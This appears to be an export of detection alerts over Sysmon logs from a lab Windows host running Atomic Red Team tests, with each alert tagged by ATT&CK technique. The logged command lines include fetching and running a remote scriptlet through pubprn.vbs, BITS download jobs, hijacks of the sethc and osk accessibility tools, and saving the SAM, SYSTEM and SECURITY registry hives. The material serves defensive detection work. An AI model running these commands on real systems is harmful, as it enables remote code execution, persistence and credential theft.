C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1,"
1
5
4
1
0
0x8000000000000000
3669
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:36.869
747F3D96-D844-5D31-0000-0010C70A2F00
2484
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
747F3D96-D844-5D31-0000-001075082F00
7140
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1,"
1
5
4
1
0
0x8000000000000000
3668
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:36.811
747F3D96-D844-5D31-0000-001075082F00
7140
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3667
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:31.222
747F3D96-D83F-5D31-0000-00105EF22E00
4888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" ),1,"
1
5
4
1
0
0x8000000000000000
3665
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:31.115
747F3D96-D83F-5D31-0000-001001EC2E00
3760
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" ),1,"
1
5
4
1
0
0x8000000000000000
3663
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:30.995
747F3D96-D83E-5D31-0000-001046E52E00
4332
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" ),1,"
1
5
4
1
0
0x8000000000000000
3661
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:30.882
747F3D96-D83E-5D31-0000-001088DE2E00
7072
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1,"
1
5
4
1
0
0x8000000000000000
3659
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:30.775
747F3D96-D83E-5D31-0000-0010A2D72E00
4036
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3733
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:07.254
747F3D96-D89F-5D31-0000-00106C7D3200
864
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3732
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:02.238
747F3D96-D89A-5D31-0000-0010F2703200
1132
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3729
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:02.144
747F3D96-D89A-5D31-0000-0010A46B3200
1228
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3728
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:52.263
747F3D96-D890-5D31-0000-001085443200
4316
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" ),1,"
1
5
4
1
0
0x8000000000000000
3727
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:52.202
747F3D96-D890-5D31-0000-0010FA3F3200
1568
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " ),1,"
1
5
4
1
0
0x8000000000000000
3725
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:52.011
747F3D96-D890-5D31-0000-001012383200
608
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx "
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D88F-5D31-0000-0010BD353200
2780
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ),1,"
1
5
4
1
0
0x8000000000000000
3724
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:51.971
747F3D96-D88F-5D31-0000-0010BD353200
2780
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3723
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:43.520
747F3D96-D887-5D31-0000-0010D51F3200
752
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" ),1,"
1
5
4
1
0
0x8000000000000000
3721
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:41.646
747F3D96-D885-5D31-0000-00107F1A3200
2832
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" ),1,"
1
5
4
1
0
0x8000000000000000
3719
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:39.214
747F3D96-D883-5D31-0000-0010839B3100
3904
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" ),1,"
1
5
4
1
0
0x8000000000000000
3717
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.603
747F3D96-D87D-5D31-0000-0010958F3100
1728
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1,"
1
5
4
1
0
0x8000000000000000
3715
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.541
747F3D96-D87D-5D31-0000-0010FA8A3100
3868
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1,"
1
5
4
1
0
0x8000000000000000
3713
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.365
747F3D96-D87D-5D31-0000-0010CA843100
3900
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1,"
1
5
4
1
0
0x8000000000000000
3711
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.284
747F3D96-D87D-5D31-0000-00103B803100
324
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1,"
1
5
4
1
0
0x8000000000000000
3709
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:33.209
747F3D96-D87D-5D31-0000-0010B37B3100
3616
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
